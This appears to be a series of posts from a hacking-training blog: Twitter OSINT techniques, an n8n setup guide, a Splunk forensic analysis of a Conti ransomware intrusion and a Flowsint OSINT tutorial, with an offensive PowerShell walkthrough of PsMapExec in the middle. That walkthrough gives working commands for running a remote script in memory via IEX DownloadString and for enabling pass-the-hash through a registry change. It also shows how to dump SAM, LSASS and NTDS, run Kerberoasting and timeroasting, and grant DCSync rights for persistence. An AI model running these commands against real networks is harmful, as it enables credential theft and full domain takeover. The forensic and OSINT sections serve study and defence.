-filter:replies – Excludes replies from search results

#hashtag – Shows tweets containing a specific hashtag

"exact phrase" – Shows tweets containing an exact phrase

For example, to find tweets from a specific user about cybersecurity posted in the first half of 2024, you could use:

from:username cybersecurity since:2024-01-01 until:2024-06-30

The power of these operators becomes apparent when you combine them. For instance, to find tweets containing images posted near a specific location during a particular event:

near:Moscow within:5mi filter:images since:2023-04-15 until:2024-04-16 drone

This would help you find images shared on X during the drone attack on Moscow.

Profile Analysis and Behavioral Intelligence

Every Twitter account leaves digital fingerprints that tell a story far beyond what users intend to reveal.

The Account Creation Time Signature

Account creation patterns often expose coordinated operations with startling precision. During one investigation of a corporate disinformation campaign, researchers discovered 23 accounts created within a 48-hour window in March 2023, all targeting the same pharmaceutical company. The accounts had been carefully aged for six months before activation, but their synchronized birth dates revealed centralized creation despite the use of different IP addresses and varied profile information.

Username Evolution Archaeology: A cybersecurity firm tracking ransomware operators found that a key player had changed usernames 14 times over two years, but each transition left traces. By documenting the evolution @crypto_expert → @blockchain_dev → @security_researcher → @threat_analyst, investigators revealed the account operator’s attempt to build credibility in different communities while maintaining the same underlying network connections.

Visual Identity Intelligence: Profile image analysis has become remarkably sophisticated. When investigating a suspected foreign influence operation, researchers used reverse image searches to discover that 8 different accounts were using professional headshots from the same stock photography session—but cropped differently to appear unrelated. The original stock photo metadata revealed it was purchased from a server in Eastern Europe, contradicting the accounts’ claims of U.S. residence.

Temporal Behavioral Fingerprinting

Human posting patterns are as unique as fingerprints, and investigators have developed techniques to extract extraordinary intelligence from timing data alone.

Geographic Time Zone Contradictions: Researchers tracking international cybercriminal networks identified coordination patterns across supposedly unrelated accounts. Five accounts claiming to operate from different U.S. cities all showed posting patterns consistent with Central European Time, despite using location-appropriate slang and cultural references. Further analysis revealed they were posting during European business hours while American accounts typically show evening and weekend activity.

Automation Detection Through Micro-Timing: A social media manipulation investigation used precise timestamp analysis to identify bot behavior. Suspected accounts were posting with unusual regularity—exactly every 3 hours and 17 minutes for weeks. Human posting shows natural variation, but these accounts demonstrated algorithmic precision that revealed automated management despite otherwise convincing content.

Network Archaeology and Relationship Intelligence

Twitter’s social graph remains one of its most valuable intelligence sources, requiring investigators to become expert relationship analysts.

The Early Follower Principle: When investigating anonymous accounts involved in political manipulation, researchers focus on the first 50 followers. These early connections often reveal real identities or organizational affiliations before operators realize they need operational security. In one case, an anonymous political attack account’s early followers included three employees from the same PR firm, revealing the operation’s true source.

Mutual Connection Pattern Analysis: Intelligence analysts investigating foreign interference discovered sophisticated relationship mapping. Suspected accounts showed carefully constructed following patterns—they followed legitimate journalists, activists, and political figures to appear authentic, but also maintained subtle connections to each other through shared follows of obscure accounts that served as coordination signals.

Reply Chain Forensics: A financial fraud investigation revealed coordination through reply pattern analysis. Seven accounts engaged in artificial conversation chains to boost specific investment content. While the conversations appeared natural, timing analysis showed responses occurred within 30-45 seconds consistently—far faster than natural reading and response times for the complex financial content being discussed.

Systematic Documentation and Intelligence Development

The most successful profile analysis investigations employ systematic documentation techniques that build comprehensive intelligence over time rather than relying on single-point assessments.

Behavioral Baseline Establishment: Investigators spend 2-4 weeks establishing normal behavioral patterns before conducting anomaly analysis. This baseline includes posting frequency, engagement patterns, topic preferences, language usage, and network interaction patterns. Deviations from the established baseline can then signal significant developments.

Multi-Vector Correlation Analysis: Advanced investigations combine temporal, linguistic, network, and content analysis to build confidence levels in conclusions. Single indicators might suggest possibilities, but convergent evidence from multiple analysis vectors provides actionable intelligence confidence levels above 85%.

Predictive Behavior Modeling: The most sophisticated investigators use historical pattern analysis to predict likely future behaviors and optimal monitoring strategies. Understanding individual behavioral patterns enables investigators to anticipate when targets are most likely to post valuable intelligence or engage in significant activities.

Summary

Modern Twitter OSINT now requires investigators to develop cross-platform correlation skills and collaborative intelligence gathering approaches. While the technical barriers have increased significantly, the platform remains valuable for those who understand how to leverage remaining accessible features through creative, systematic investigation techniques.

To improve your OSINT skills, check out our OSINT Investigator Bundle. You’ll explore both fundamental and advanced techniques and receive an OSINT Certified Investigator Voucher.

Powershell for Hackers, Part 9: Hacking with PsMapExec

24 November 2025 at 09:57

Welcome back, aspiring cyberwarriors!

During the past few months, we have been covering different ways to use PowerShell to survive, cause mayhem, and hack systems. We have also collected and created scripts for various purposes, stored in our repository for all of you to use. All these tools are extremely useful during pentests. As you know, with great power comes great responsibility. Today we will cover another tool that will significantly improve how you interact with systems. It’s called PsMapExec.

It was developed by The-Viper-One, inspired by CrackMapExec and its successor NetExec. Although PsMapExec doesn’t match NetExec feature for feature, it offers much greater stealth, since it can be loaded directly into memory without ever touching the disk. Stealth remains one of the top priorities in hacking. Beyond that, the tool can execute commands without knowing a password, authenticating with hashes or tickets instead. That’s a big advantage when you gain access to a protected user during the phishing or privilege escalation stages of a test.

The script has been around for a while but hasn’t gained much attention. That’s one of the reasons we decided to introduce it here. Like most publicly available offensive tools, it will get flagged by Defender if loaded directly. Skilled hackers often modify such scripts while keeping their core functionality intact, which helps them evade detection. Many offensive scripts rely on native Windows functions, and since those calls can’t be flagged, Microsoft and other vendors often rely on static keyword-based detection instead.

Finding a machine with no active antivirus isn’t always easy but is almost always possible. There are ways to bypass UAC, dump SAM hashes, modify the registry to allow pass-the-hash attacks, and then use a reverse proxy to connect via RDP. Once you have GUI access, your options widen. This approach isn’t the most stealthy, but it remains a reliable one.
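To give one concrete example, the registry change that re-enables pass-the-hash for local administrator accounts is a single well-known value. This is a sketch; it requires an elevated shell on the target:

PS > reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

Setting LocalAccountTokenFilterPolicy to 1 turns off UAC token filtering for remote logons, which is what allows hash-based authentication with local accounts to succeed.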

Once Defender is disabled, you can move forward and test the script. Let’s explore some of its capabilities.

Loading in Memory

To avoid touching the disk and leaving unnecessary forensic traces, it’s best to execute the script directly in memory. You can do this with the following command:

PS > IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")

Once it’s loaded, we can proceed.

Dumping SAM Hashes

One of the first logical steps after gaining access to a host is dumping its hashes. SAM and LSASS attacks are among the most common ways to recover credentials. SAM gives you local user account hashes, while LSASS holds credentials of logged-on users, including domain administrators and privileged accounts. In some organizations, critical users may belong to the Protected Users group, which prevents their credentials from being cached in memory. While not a widespread practice, it’s something worth noting.

To dump local accounts from a single machine:

PS > PsMapExec smb -Targets MANAGER-1 -Module SAM -ShowOutput

To dump local accounts from all machines in a domain:

PS > PsMapExec smb -Targets all -Module SAM -ShowOutput

[Image: dumping SAM with PsMapExec]

The output is clean and only includes valid local accounts.

Dumping LSASS Hashes

LSASS (Local Security Authority Subsystem Service) handles authentication on Windows systems. When you log in, your credentials are sent to the Domain Controller for validation, and if approved, you get a session token. Domain credentials are only stored temporarily on local machines. Even when a session is locked, credentials may still reside in memory.

To dump LSASS locally using an elevated shell:

PS > PsMapExec smb -Targets "localhost" -Module "LoginPasswords" -ShowOutput

If the current user doesn’t have permission, specify credentials manually:

PS > PsMapExec smb -Targets "DC" -Username "user" -Password "password" -Module "LoginPasswords" -ShowOutput

[Image: dumping LSASS with PsMapExec]

You can also perform this remotely with the same syntax.

Remote Command Execution

Every network is different. Some environments implement segmentation to prevent lateral movement, which adds complexity. Moving through intermediate hosts to reach otherwise isolated segments is called pivoting.

To view network interfaces on all domain machines:

PS > PsMapExec SMB -Target all -Username "user" -Password "password" -Command "ipconfig" -Domain "sekvoya.local"

To query a single machine:

PS > PsMapExec SMB -Target "DC" -Username "user" -Password "password" -Command "ipconfig" -Domain "sekvoya.local"

[Image: executing commands remotely with PsMapExec]

You can execute other reconnaissance commands in the same way. After identifying valuable hosts, you may want to enable WinRM for stealthier interaction:

PS > PsMapExec SMB -Target "MANAGER-1" -Username "user" -Password "password" -Command "winrm quickconfig -q" -Domain "sekvoya.local"
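With WinRM enabled, you can drop into an interactive session using PowerShell’s built-in remoting. The host and account below are the same placeholders used above; you’ll be prompted for the password:

PS > Enter-PSSession -ComputerName MANAGER-1 -Credential sekvoya\user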

Kerberos Tickets

Another valuable module PsMapExec provides is Kerbdump, which allows you to dump Kerberos tickets from remote memory. These tickets can be extracted for offline analysis or attacks such as Pass-the-Ticket. In Active Directory environments, Kerberos is responsible for issuing and validating these “passes” for authentication.

Some domains may disable NTLM for security reasons, which means you’ll rely on Kerberos. It’s a normal and frequent part of AD traffic, making it a subtle and effective method.

PS > PsMapExec -Method smb -Targets DC -Username "user" -Password "password" -Module "KerbDump" -ShowOutput

[Image: kerberoasting with PsMapExec]

The script parses the output automatically and gives you usable results.

Kerberoasting

Kerberoasting is a different kind of attack compared to simply dumping tickets. It focuses on obtaining Kerberos service tickets and brute-forcing them offline to recover plaintext credentials. The main idea is to assign an SPN to a target user and then extract their ticket.

Set an SPN for a user:

PS > PsMapExec ldap -Targets DC -Module AddSPN -TargetDN "CN=username,DC=SEKVOYA,DC=LOCAL"

Then kerberoast that user:

PS > PsMapExec kerberoast -Target "DC" -Username "user" -Password "password" -Option "kerberoast:adm_ivanov" -ShowOutput

[Image: KerbDump with PsMapExec]

This technique is effective for persistence and privilege escalation.

Ekeys

Kerberos tickets are encrypted using special encryption keys. Extracting these allows you to decrypt or even forge tickets, which can lead to deeper persistence and movement within the domain.

PS > PsMapExec wmi -Targets all -Module ekeys -ShowOutput

[Image: extracting ekeys with PsMapExec]

Targeting all machines in a big domain can create noise and compromise operational security.

Timeroasting

Timeroasting is another attack on Active Directory environments, exploiting how computers sync their clocks using the Network Time Protocol (NTP). In simple terms, it’s a way for hackers to trick a Domain Controller into revealing password hashes for computer accounts. These hashes can then be cracked offline to recover the actual passwords, helping attackers move around the network or escalate privileges. Computer account passwords are usually long and random, but if they’re weak or reused, cracking succeeds. No alerts are triggered, since it looks like a normal time-sync query. The attack is hard to pull off, but it’s possible: when a new computer account is configured as a “pre-Windows 2000 computer”, its password is derived from its name. If the account name is MANAGER$, the password is the lowercase computer name without the trailing $. When it isn’t configured like that, the password is randomly generated.

PS > PsMapExec ldap -Targets DC -Module timeroast -ShowOutput

[Image: timeroasting with PsMapExec]

Finding Files

Finding interesting or sensitive files on remote systems is an important phase in any engagement. PsMapExec’s Files module automatically enumerates non-default files within user directories.

PS > PsMapExec wmi -Targets all -Module Files -ShowOutput

[Image: finding interesting files with PsMapExec]

ACL Persistence

ACL persistence is a critical step after compromising an Active Directory domain. Credentials will rotate, hackers make mistakes that reveal their presence, and administrators will take measures to evict intruders. Implementing ACL-based persistence allows an attacker to maintain control over privileged groups or to perform DCSync attacks that extract directory data. For those unfamiliar, DCSync is an attack in which you impersonate a domain controller and request replication of the NTDS.dit data from a legitimate DC. Once obtained, the attacker acquires password hashes for all domain accounts, including the krbtgt account. Some recommend burning the domain down after a successful DCSync, because attackers will find ways to regain access.

You might think, “Okay, just reset the KRBTGT password.” Microsoft recommends doing this twice in quick succession: the first reset changes the hash for new tickets, and the second clears out the old history to fully invalidate everything. But even that is often not enough. Any Golden Tickets the attackers already forged remain usable until they expire. Default ticket lifetimes are 7-10 hours for sessions, but attackers can make theirs last up to 10 years! During this window, hackers can dig in deeper by creating hidden backdoor accounts, modifying group policies, or infecting other machines.
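If the Active Directory PowerShell module is available, checking when krbtgt was last rotated takes one line. This is a quick sketch using a standard RSAT cmdlet:

PS > Get-ADUser krbtgt -Properties PasswordLastSet | Select-Object PasswordLastSet

A timestamp that is years old is a strong hint that the double reset was never performed.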

Assign DCSync privileges:

PS > PsMapExec ldap -Target DC -Module Elevate -TargetDN "CN=username,DC=SEKVOYA,DC=LOCAL"

[Image: DACL abuse and persistence with PsMapExec]

NTDS Dump

The NTDS dump is the final stage once domain admin privileges are obtained. Extracting NTDS.dit and associated registry hives allows for offline cracking and full credential recovery.

PS > PsMapExec SMB -Targets "DC" -Username "user" -Password "password" -Module NTDS -ShowOutput

[Image: dumping NTDS with PsMapExec]

This provides complete domain compromise capabilities and the ability to analyze or reuse credentials at will.

Summary

PsMapExec is a powerful framework that takes PowerShell-based network exploitation to a new level. It combines stealth and practicality, making it suitable for both red teamers and penetration testers who need to operate quietly within Windows domains. Its ability to run fully in memory minimizes traces, and its modules cover nearly every stage of network compromise, from reconnaissance and privilege escalation to persistence and data extraction. While we only explored some of its most impactful commands, PsMapExec offers far more under the hood. The more you experiment with it, the more its potential becomes evident.

Want to become a Powershell expert? Join our Powershell for Hackers training, March 10-12!

Automating Your Digital Life with n8n

21 November 2025 at 10:09

Welcome back, aspiring cyberwarriors!

As you know, there are plenty of automation tools out there, but most of them are closed-source, cloud-only services that charge you per operation and keep your data on their servers. For those of us who value privacy and transparency, these solutions simply won’t do. That’s where n8n comes into the picture – a free, private workflow automation platform that you can self-host on your own infrastructure while maintaining complete control over your data.

In this article, we explore n8n, set it up on a Raspberry Pi, and create a workflow for monitoring security news and sending it to Matrix. Let’s get rolling!

What is n8n?

n8n is a workflow automation platform that combines AI capabilities with business process automation, giving technical teams the flexibility of code with the speed of no-code. The platform uses a visual node-based interface where each node represents a specific action, for example, reading an RSS feed, sending a message, querying a database, or calling an API. When you connect these nodes, you create a workflow that executes automatically based on triggers you define.

With over 400 integrations, native AI capabilities, and a fair-code license, n8n lets you build powerful automation while maintaining full control over your data and deployments.

The Scenario: RSS Feed Monitoring with Matrix Notifications

For this tutorial, we’re going to build a practical workflow that many security professionals and tech enthusiasts need: automatically monitoring RSS feeds from security news sites and threat intelligence sources, then sending new articles directly to a Matrix chat room. Matrix is an open-source, decentralized communication protocol—essentially a privacy-focused alternative to Slack or Discord that you can self-host.

Step #1: Installing n8n on Raspberry Pi

Let’s get started by setting up n8n on your Raspberry Pi. First, we need to install Docker, which is the easiest way to run n8n on a Raspberry Pi. SSH into your Pi and run these commands:

pi> curl -fsSL https://get.docker.com -o get-docker.sh
pi> sudo sh get-docker.sh
pi> sudo usermod -aG docker pi

Log out and back in for the group changes to take effect. Now we can run n8n with Docker in a dedicated directory:

pi> sudo mkdir -p /opt/n8n/data

pi> sudo chown -R 1000:1000 /opt/n8n/data

pi> sudo docker run -d --restart unless-stopped --name n8n \
-p 5678:5678 \
-v /opt/n8n/data:/home/node/.n8n \
-e N8N_SECURE_COOKIE=false \
n8nio/n8n

This command runs n8n as a background service that automatically restarts if it crashes or when your Pi reboots. It maps port 5678 so you can access the n8n interface, and it mounts the persistent volume at /opt/n8n/data so your workflows and credentials survive container restarts. The N8N_SECURE_COOKIE=false setting lets you reach the interface over plain HTTP; no HTTPS is required.

Give it a minute to download and start, then open your web browser and navigate to http://your-raspberry-pi-ip:5678. You should see the n8n welcome screen asking you to create your first account.
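If the welcome screen never appears, you can watch the container’s startup logs with a standard Docker command:

pi> sudo docker logs -f n8n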

Step #2: Understanding the n8n Interface

Once you’re logged in and have created your first workflow, you’ll see the n8n canvas—a blank workspace where you’ll build your workflows. The interface is intuitive, but let me walk you through the key elements.

On the right side, you’ll see a list of available nodes organized by category (press the Tab key to open it). These are the building blocks of your workflows. There are trigger nodes that start your workflow (like RSS Feed Trigger, Webhook, or Schedule), action nodes that perform specific tasks (like HTTP Request or Function), and logic nodes that control flow (like IF conditions and Switch statements).

The main canvas in the center is where you’ll drag and drop nodes and connect them. Each connection represents data flowing from one node to the next. When a workflow executes, data passes through each node in sequence, getting transformed and processed along the way.

Step #3: Creating Your First Workflow – RSS to Matrix

Now let’s build our RSS monitoring workflow. Click the “Add workflow” button to create a new workflow. Give it a meaningful name like “Security RSS to Matrix”.

We’ll start by adding our trigger node. Click the plus icon on the canvas and search for “RSS Feed Trigger”. Select it and you’ll see the node configuration panel open on the right side.

In the RSS Feed Trigger node configuration, you need to specify the RSS feed URL you want to monitor. For this example, let’s use the Hackers-Arise feed.

The RSS Feed Trigger has several important settings. The Poll Times setting determines how often n8n checks the feed for new items. You can set it to check every hour, every day, or on a custom schedule. For a security news feed, checking every hour makes sense, so you get timely notifications without overwhelming your Matrix room.

Click “Execute Node” to test it. You should see the latest articles from the feed appear in the output panel. Each article contains data like title, link, publication date, and sometimes the author. This data will flow to the next nodes in your workflow.

Step #4: Configuring Matrix Integration

Now we need to add the Matrix node to send these articles to your Matrix room. Click the plus icon to add a new node and search for “Matrix”. Select the Matrix node and “Create a message” as the action.

Before we can use the Matrix node, we need to set up credentials. Click on “Credential to connect with” and select “Create New”. You’ll need to provide your Matrix homeserver URL, your Matrix username, and password or access token.

Now comes the interesting part—composing the message. n8n uses expressions to pull data from previous nodes. In the message field, you can reference data from the RSS Feed Trigger using expressions like {{ $json.title }} and {{ $json.link }}.

Here’s a good message template that formats the RSS articles nicely:

🔔 New Article: {{ $json.title }}

{{ $json.description }}

🔗 Read more: {{ $json.link }}

Step #5: Testing and Activating Your Workflow

Click the “Execute Workflow” button at the top. You should see the workflow execute, data flow through the nodes, and if everything is configured correctly, a message will appear in your Matrix room with the latest RSS article.

Once you’ve confirmed the workflow works correctly, activate it by clicking the toggle switch at the top of the workflow editor.

The workflow is now running automatically! The RSS Feed Trigger will check for new articles according to the schedule you configured, and each new article will be sent to your Matrix room.

Summary

The workflow we built today, monitoring RSS feeds and sending security news to Matrix, demonstrates n8n’s practical value. Whether you’re aggregating threat intelligence, monitoring your infrastructure, managing your home lab, or just staying on top of technology news, n8n can eliminate the tedious manual work that consumes so much of our time.

Digital Forensics: Investigating Conti Ransomware with Splunk

20 November 2025 at 10:58

Welcome back, aspiring digital forensic investigators!

The world of cybercrime continues to grow every year, and attackers constantly discover new opportunities and techniques to break into systems. One of the most dangerous and well-organized ransomware groups in recent years was Conti. Conti operated almost like a real company, with dedicated teams for developing malware, gaining network access, negotiating with victims, and even providing “customer support” for payments. The group targeted governments, hospitals, corporations, and many other high-value organizations. Their attacks included encrypting systems, stealing data, and demanding extremely high ransom payments.

For investigators, Conti became an important case study because their operations left behind a wide range of forensic evidence from custom malware samples to fast lateral movement and large-scale data theft. Even though the group officially shut down after their internal chats were leaked, many of their operators, tools, and techniques continued to appear in later attacks. This means Conti’s methods still influence modern ransomware operations which makes it a valid topic for forensic investigators.

Today, we are going to look at a ransomware incident involving Conti malware and analyze it with Splunk to understand how an Exchange server was compromised and what actions the attackers performed once inside.

Splunk

Splunk is a platform that collects and analyzes large amounts of machine data, such as logs from servers, applications, and security tools. It turns this raw information into searchable events, graphs, and alerts that help teams understand what is happening across their systems in real time. Companies mainly use Splunk for monitoring, security operations, and troubleshooting issues. Digital forensics teams also use Splunk because it can quickly pull together evidence from many sources and show patterns that would take much longer to find manually.

Time Filter

Splunk’s default time range is the last 24 hours. However, when investigating incidents, especially ransomware, you often need a much wider view. Changing the filter to “All time” helps reveal older activity that may be connected to the attack. Many ransomware operations begin weeks or even months before the final encryption stage. Keep in mind that searching all logs can be heavy on large environments, but in our case this wider view is necessary.

[Image: the time filter in Splunk]

Index

An index in Splunk is like a storage folder where logs of a particular type are placed. For example, Windows Event Logs may go into one index, firewall logs into another, and antivirus logs into a third. When you specify an index in your search, you tell Splunk exactly where to look. But since we are investigating a ransomware incident, we want to search through every available index:

index=*

[Image: analyzing available fields in Splunk]

This ensures that nothing is missed and all logs across the environment are visible to us.

Fields

Fields are pieces of information extracted from each log entry, such as usernames, IP addresses, timestamps, file paths, and event IDs. They make your searches much more precise, allowing you to filter events with expressions like src_ip=10.0.0.5 or user=Administrator. In our case, we want to focus on executable files, which is what the Image field records. If you don’t see it in the left pane, click “More fields” and add it.

adding more fields to splunk search

Once you’ve added it, click Image in the left pane to see the top 10 results. 

top 10 executed images

These results are definitely not enough to begin our analysis, so we can expand the list using the top command:

index=* | top limit=100 Image

top 100 results on images executed
suspicious binary found in splunk

Here the cmd.exe process running in the Administrator’s user folder looks very suspicious. This is unusual, so we should check it closely. We also see commands like net1, net, whoami, and rundll32.

recon commands found

In one of our articles, we learned that net1 works just like net and can help attackers evade detection when security rules only watch for net.exe. The rundll32 binary is designed to run DLL files and is commonly abused by attackers. It seems the attacker used normal system tools to explore the environment, and they may also have used rundll32 to maintain a foothold.

At this point, we can already say the attacker performed reconnaissance and could have used rundll32 for persistence or further execution.
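To pull these reconnaissance commands together with their full command lines in a single view, a search along these lines can help (field names assume standard Sysmon extractions in your environment):

index=* (Image=*whoami.exe OR Image=*net.exe OR Image=*net1.exe OR Image=*rundll32.exe) | table _time, host, Image, CommandLine | sort _time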

Hashes

Next, let’s investigate the suspicious cmd.exe more closely. Its location alone is a red flag, but checking its hashes will confirm whether it is malicious.

index=* Image="C:\\Users\\Administrator\\Documents\\cmd.exe" | table Image, Hashes

getting image hashes in splunk

Copy one of the hashes and search for it on VirusTotal.

virus total results of the conti ransomware

The results confirm that this file belongs to a Conti ransomware sample. VirusTotal provides helpful behavior analysis and detection labels that support our findings. When investigating a real incident, review these details closely to understand exactly what happened to your system.

Net1

Now let’s see what the attacker did using the net1 command:

index=* Image=*net1.exe

net1 found adding a new user to the remote desktop users group

The logs show that a new user was added to the Remote Desktop Users local group. This allows the attacker to log in through RDP on that specific machine. Since this is a local group modification, it affects only that workstation.

In MITRE ATT&CK, this action falls under Persistence. The hackers made sure they could connect to the host even if other credentials were lost. Also, they may have wanted to log in via GUI to explore the system more comfortably.

TargetFilename

This field usually appears in file-related logs, especially Windows Security Logs, Sysmon events, or EDR data. It tells you the exact file path and file name that a process interacted with. This can include files being created, modified, deleted, or accessed. That means we can find files that malware interacted with. If you can’t find the TargetFilename field in the left pane, just add it.

Run:

index=* Image="C:\\Users\\Administrator\\Documents\\cmd.exe"

Then select TargetFilename

ransom notes found

We see that the ransomware created many "readme" files containing a ransom note. Spreading notes everywhere is common ransomware behavior, and encrypting data is the final step in attacks like this. We still need to figure out how the attacker got into the system and gained high privileges.
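As a quick aside, you can quantify the ransom notes instead of scrolling through them with a stats query along these lines (assuming the notes follow the readme naming seen here):

index=* Image="C:\\Users\\Administrator\\Documents\\cmd.exe" TargetFilename=*readme* | stats dc(TargetFilename) AS ransom_notes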

Before we do that, let’s see how the ransomware was propagated across the domain:

index=* TargetFilename=*cmd.exe

wmi subscription propagated the ransomware

Unsecapp.exe is a legitimate Microsoft binary, but its appearance usually means something triggered WMI activity, because Windows launches unsecapp.exe only when a program needs to receive asynchronous WMI callbacks. In our case, the ransomware was spread using WMI and infected the other hosts where the required ports were open. This is a very common approach.

Sysmon Events

Sysmon Event ID 8 indicates a CreateRemoteThread event, meaning one process created a thread inside another. This is a strong sign of malicious activity because attackers use it for process injection, privilege escalation, or credential theft.

List these events:

index=* EventCode=8

event code 8 found

Expanding the log reveals another executable interacting with lsass.exe. This is extremely suspicious because lsass.exe stores credentials. Attacking LSASS is a common step for harvesting passwords or hashes.

found wmi subscription accessing lsass.exe to dump creds

Here is another instance of unsecapp.exe, and it is not normal to see it accessing lsass.exe. Our best guess is that something used WMI, and that WMI activity triggered code inside unsecapp.exe that ended up touching LSASS. The goal was likely to dump LSASS periodically until domain admin credentials appeared. If domain admins are not in the Protected Users group, their credentials are cached in the memory of any machine they log into. If that machine is compromised, the whole domain is compromised as well.
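To isolate only the remote-thread events that touch LSASS, you can narrow the Event ID 8 search like this (again assuming standard Sysmon field names):

index=* EventCode=8 TargetImage=*lsass.exe | table _time, host, SourceImage, TargetImage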

Exchange Server Compromise

Exchange servers are a popular target for attackers. Over the years, they have suffered from multiple critical vulnerabilities. They also hold high privileges in the domain, making them valuable entry points. In this case, the hackers used the ProxyShell vulnerability chain. The exploit abused the mailbox export function to write a malicious .aspx file (a web shell) to any folder that Exchange can access. Instead of a harmless mailbox export, Exchange unknowingly writes a web shell directly into the FrontEnd web directory. From there, the attacker can execute system commands, upload tools, and create accounts with high privileges.

To find the malicious .aspx file in our logs we should query this:

index=* source=*sysmon* *aspx

finding an aspx shell used for exchange compromise with proxyshell

We can clearly see that the web shell was placed where Exchange has web-accessible permissions. This web shell was the attacker's access point.

Timeline

The attack began when the intruder exploited the ProxyShell vulnerabilities on the Exchange server. By abusing the mailbox export feature, they forced Exchange to write a malicious .aspx web shell into a web-accessible directory. This web shell became their entry point and allowed them to run commands directly on the server with high privileges. After gaining access, the attacker carried out quiet reconnaissance using built-in tools such as cmd.exe, net1, whoami, and rundll32. Using net1, the attacker added a new user to the Remote Desktop Users group to maintain persistence and guarantee a backup login method. The attacker then spread the ransomware across the network using WMI. The appearance of unsecapp.exe showed that WMI activity was being used to launch the malware on other hosts. Sysmon Event ID 8 logged remote thread creation in which a system binary attempted to access lsass.exe, suggesting the attacker tried to dump credentials from memory. This activity points to a mix of WMI abuse and process injection aimed at obtaining higher privileges, especially domain-level credentials.

Finally, once the attacker had moved laterally and prepared the environment, the ransomware (cmd.exe) encrypted systems and began creating ransom note files throughout these systems. This marked the last stage of the operation.

Summary

Ransomware is more than just a virus; it's a carefully planned attack in which intruders move through a network quietly before causing damage. In digital forensics we often face these attacks, and investigating them means piecing together how the malware entered the system, what tools it used, which accounts it compromised, and how it spread. Logs, processes, and file changes each tell part of the story. By following these traces, we understand the attacker's methods, see where defenses failed, and learn how to prevent future attacks. It's like reconstructing a crime scene. Sometimes, we might even be lucky enough to shut down the attackers' entire infrastructure before they can cause more damage.

If you need forensic assistance, you can hire our team to investigate and mitigate incidents. Additionally, we provide classes on digital forensics for those looking to expand their skills and understanding in this field. 

Open Source Intelligence (OSINT): Using Flowsint for Graph-Based Investigations

19 November 2025 at 10:54

Welcome back, aspiring cyberwarriors!

In our industry, we often find ourselves overwhelmed by data from numerous sources. You might be tracking threat actors across social media platforms, mapping domain infrastructure for a penetration test, investigating cryptocurrency transactions tied to ransomware operations, or simply trying to understand how different pieces of intelligence connect to reveal the bigger picture. The challenge is not finding data but making sense of it all. Traditional OSINT tools come and go, scripts break when APIs change, and your investigation notes end up scattered across spreadsheets, text files, and fragile Python scripts that stop working the moment a service updates its interface.

As you know, the real value in intelligence work is not in collecting isolated data points but in understanding the relationships between them. A domain by itself tells you little. But when you can see that a domain connected to an IP address, that IP is tied to an ASN owned by a specific organization, that organization is linked to social media accounts, and those accounts are associated with known threat actors, suddenly you have actionable intelligence. The problem is that most OSINT tools force you to work in silos. You run one tool to enumerate subdomains, another to check WHOIS records, and a third to search for breaches. Then, you manually try to piece it all together in your head or in a makeshift spreadsheet.

To solve these problems, we’re going to explore a tool called Flowsint – an open-source graph-based investigation platform. Let’s get rolling!

Step #1: Install Prerequisites

Before we can run Flowsint, we need to make certain we have the necessary prerequisites installed on our system. Flowsint uses Docker to containerize all its components. You will also need Make, a build automation tool that builds executable programs and libraries from source code.

In this tutorial, I will be installing Flowsint on my Raspberry Pi 4 system, but the instructions are nearly identical for use with other operating systems as long as you have Docker and Make installed.

First, make certain you have Docker installed.
kali > docker --version

Next, make sure you have Make installed.
kali > make --version

Now that we have our prerequisites in place, we are ready to download and install Flowsint.

Step #2: Clone the Flowsint Repository

Flowsint is hosted on GitHub as an open-source project. Clone the repository with the following command:
kali > git clone https://github.com/reconurge/flowsint.git
kali > cd flowsint

To install and start Flowsint in production mode, simply run:
kali > make prod

This command will do several things. It will build the Docker images for all the Flowsint components, start the necessary containers, including the Neo4j graph database, PostgreSQL database for user management, the FastAPI backend server, and the frontend application. It will also configure networking between the containers and set up the initial database schemas.

The first time you run this command, it may take several minutes to complete as Docker downloads base images and builds the Flowsint containers. You should see output in your terminal showing the progress of each build step. Once the installation completes, all the Flowsint services will be running in the background.

You can verify that the containers are running with:
kali > docker ps

Step #3: Create Your Account

With Flowsint now running, we can access the web interface and create our first user account. Open your web browser and navigate to: http://localhost:5173/register

Once you have filled in the registration form and logged in, you will now see the main interface, where you can begin building your investigations.

Step #4: Creating Your First Investigation

Let’s create a simple investigation to see how Flowsint works in practice.

After creating the investigation, we can view analytics about it and, most importantly, create our first sketch using the panel on the left. Sketches allow you to organize and visualize your data as a graph.

After creating the sketch, we need to add our first node to the ‘items’ section. In this case, let’s use a domain name.

Enter a domain name you want to investigate. For this tutorial, I will use the lenta.ru domain.

You should now see a node appear on the graph canvas representing your domain. Click on this node to select it and view the available transforms. You will see a list of operations you can perform on this domain entity.

Step #5: Running Transforms to Discover Relationships

Now that we have a domain entity in our graph, let’s run some transforms to discover related infrastructure and build out our investigation.

With your domain entity selected, look for the transform that will resolve the domain to its IP addresses. Flowsint will query DNS servers to find the IP addresses associated with your domain and create new IP entities in your graph connected to the domain with a relationship indicating the DNS resolution.

Let’s run another transform. Select your domain entity again, and this time run the WHOIS Lookup transform. This transform will query WHOIS databases to get domain registration information, including the registrar, registration date, expiration date, and sometimes contact information for the domain owner.

Now select one of the IP address entities that was discovered. You should see a different set of available transforms specific to IP addresses. Run the IP Information transform. This transform will get geolocation and network details for the IP address, including the country, city, ISP, and other relevant information.

Step #6: Chaining Transforms for Deeper Investigation

One of the powerful features of Flowsint is the ability to chain transforms together to automate complex investigation workflows. Instead of manually running each transform one at a time, you can set up sequences of transforms that execute automatically.

Let’s say you want to investigate not just a single domain but all the subdomains associated with it. Select your original domain entity and run the Domain to Subdomains transform. This transform will enumerate subdomains using various techniques, including DNS brute forcing, certificate transparency logs, and other sources.

Each discovered subdomain will appear as a new domain entity in your graph, connected to the parent domain.

Step #7: Investigating Social Media and Email Connections

Flowsint is not limited to technical infrastructure investigation. It also includes transforms for investigating individuals, organizations, social media accounts, and email addresses.

Let’s add an email address entity to our graph. In the sidebar, select the email entity type and enter an email address associated with your investigation target.

Once you have created the email entity, select it and look at the available transforms. You will see several options, including Email to Gravatar, Email to Breaches, and Email to Domains.

Summary

In many cases, cyberwarriors must make sense of vast amounts of interconnected data from diverse sources. A platform such as Flowsint provides the durable foundation we need to conduct comprehensive investigations that remain stable even as tools and data sources evolve around it.

Whether you are investigating threat actors, mapping infrastructure, tracking cryptocurrency flows, or uncovering human connections, Flowsint gives you the power to connect the dots and see the truth.

Smart Home Hacking: Getting Started

